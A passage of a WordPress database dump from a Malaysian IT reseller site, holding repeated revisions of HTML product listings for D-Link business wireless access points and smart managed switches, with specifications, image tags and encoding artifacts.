sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:24:55','2018-12-20 06:24:55','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2640,1,'2018-12-20 14:25:46','2018-12-20 06:25:46','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:25:46','2018-12-20 06:25:46','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2647,1,'2018-12-20 14:40:58','2018-12-20 06:40:58','','DES-1510-52-510x600','','inherit','closed','closed','','des-1510-52-510x600','','','2018-12-20 14:40:58','2018-12-20 06:40:58','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg',0,'attachment','image/jpeg',0),(2648,1,'2018-12-20 14:41:16','2018-12-20 06:41:16','','DGS-1510-28XMP_A1_Image-LFront-510X600-510x600','','inherit','closed','closed','','dgs-1510-28xmp_a1_image-lfront-510x600-510x600','','','2018-12-20 14:41:16','2018-12-20 06:41:16','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg',0,'attachment','image/jpeg',0),(2649,1,'2018-12-20 14:41:34','2018-12-20 06:41:34','','DGS-1510-28X-510x600','','inherit','closed','closed','','dgs-1510-28x-510x600','','','2018-12-20 14:41:34','2018-12-20 06:41:34','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg',0,'attachment','image/jpeg',0),(2650,1,'2018-12-20 14:42:26','2018-12-20 06:42:26','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p>		\n			<h4>10-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-10TS_A1_Image-LFront-510x6003-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T Â with Â Two Â slots for 10 Gigabit SFP+</p><p>â€¢ Suitable for virtualization, cloud services and server-to-server applications</p><p>â€¢ D-link Green Technology conserves energy by powering down unused ports</p><p>â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢ Support G.8032 ERPS to achieve high reliability and network stability</p><p>â€¢ 802.1X port based authentication, for authentication through external RADIUS servers</p><p>â€¢ Support D-Link Network Assistant Utility to simplifies the configuration</p><p>â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:42:26','2018-12-20 06:42:26','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2651,1,'2018-12-20 14:47:07','2018-12-20 06:47:07','[vfb id=5]','Get Quotation (D-Link)','','publish','closed','closed','','get-quotation-d-link','','','2018-12-20 14:47:07','2018-12-20 06:47:07','',0,'https://bintara.com.my/?page_id=2651',0,'page','',0),(2652,1,'2018-12-20 14:46:53','2018-12-20 06:46:53','[vfb id=5]','Get Quotation (D-Link)','','inherit','closed','closed','','2651-revision-v1','','','2018-12-20 14:46:53','2018-12-20 06:46:53','',2651,'https://bintara.com.my/blog/2018/12/20/2651-revision-v1/',0,'revision','',0),(2654,1,'2018-12-20 14:49:47','2018-12-20 06:49:47','','DGS-1100-26-front-510x600-510x600','','inherit','closed','closed','','dgs-1100-26-front-510x600-510x600','','','2018-12-20 14:49:47','2018-12-20 06:49:47','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg',0,'attachment','image/jpeg',0),(3356,1,'2019-09-25 12:24:50','2019-09-25 04:24:50','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			